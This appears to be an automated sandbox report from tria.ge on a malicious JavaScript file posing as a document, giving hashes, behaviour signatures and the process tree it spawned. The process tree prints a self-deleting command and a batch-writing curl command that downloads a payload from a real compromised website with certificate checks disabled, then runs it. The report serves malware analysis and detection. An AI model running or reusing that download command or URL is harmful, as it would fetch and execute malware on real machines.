Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 118s
max time network: 122s
platform: windows7_x64
resource: win7-20230831-en
resource tags: arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
submitted
14/10/2023, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
Document_09_13_927.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Document_09_13_927.js
Resource
win10v2004-20230915-en
General
-
Target
Document_09_13_927.js
-
Size
43KB
-
MD5
03677c4079fafd6413c5552f3d6da926
-
SHA1
28f14a816b7fb22630c7d59af9d404f51dab4f69
-
SHA256
32ee3a4074bff70f212b88233f37f72796982c3e579fcdcc7c773ae5c41ae010
-
SHA512
debf24ab43ea09c567afe47e5289fad62fb19e7d8d1d6401e466feec1f1da84e3652e06854750e0911cdeead48b7a86bfeb74e440ca43bbda9588162da9875fc
-
SSDEEP
384:eo/1qDp3h548/pzFhb2uhK2U2yoWmfrL4tuEsSRqQ1SDIJnjOsetOI88s8vr6z1d:/qHLi+lIR6J2kzqpaJfs9
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2600 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 9 IoCs
description | pid | Process | procid_target
PID 2200 wrote to memory of 2600 | 2200 | wscript.exe | 29
PID 2200 wrote to memory of 2600 | 2200 | wscript.exe | 29
PID 2200 wrote to memory of 2600 | 2200 | wscript.exe | 29
PID 2200 wrote to memory of 2132 | 2200 | wscript.exe | 30
PID 2200 wrote to memory of 2132 | 2200 | wscript.exe | 30
PID 2200 wrote to memory of 2132 | 2200 | wscript.exe | 30
PID 2200 wrote to memory of 2728 | 2200 | wscript.exe | 33
PID 2200 wrote to memory of 2728 | 2200 | wscript.exe | 33
PID 2200 wrote to memory of 2728 | 2200 | wscript.exe | 33
Processes
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\Document_09_13_927.js
  - Suspicious use of WriteProcessMemory
  PID:2200
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Document_09_13_927.js"
    - Deletes itself
    PID:2600
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c echo curl https://shankarmallapur.com/wp-content/ewww/image-backup/uploads/2019/11/6603.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatem.p" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"
    PID:2132
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"
    PID:2728
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
184B
MD5 69d466581b9f52f28ca830ea196000d1
SHA1 e28316b3d54e97322014e898b4025139286c014c
SHA256 4d0fa867e22ced070e431af28666e0e2caaa1822b61f0424610a903e73f87118
SHA512 b8cdbcafb5e8b2b12fd2bb3041ca4bbd2f533b1069911cea355e647044ee3cd795671fba486f44125835d60a93876485d6784db31eb080707daeac105922844e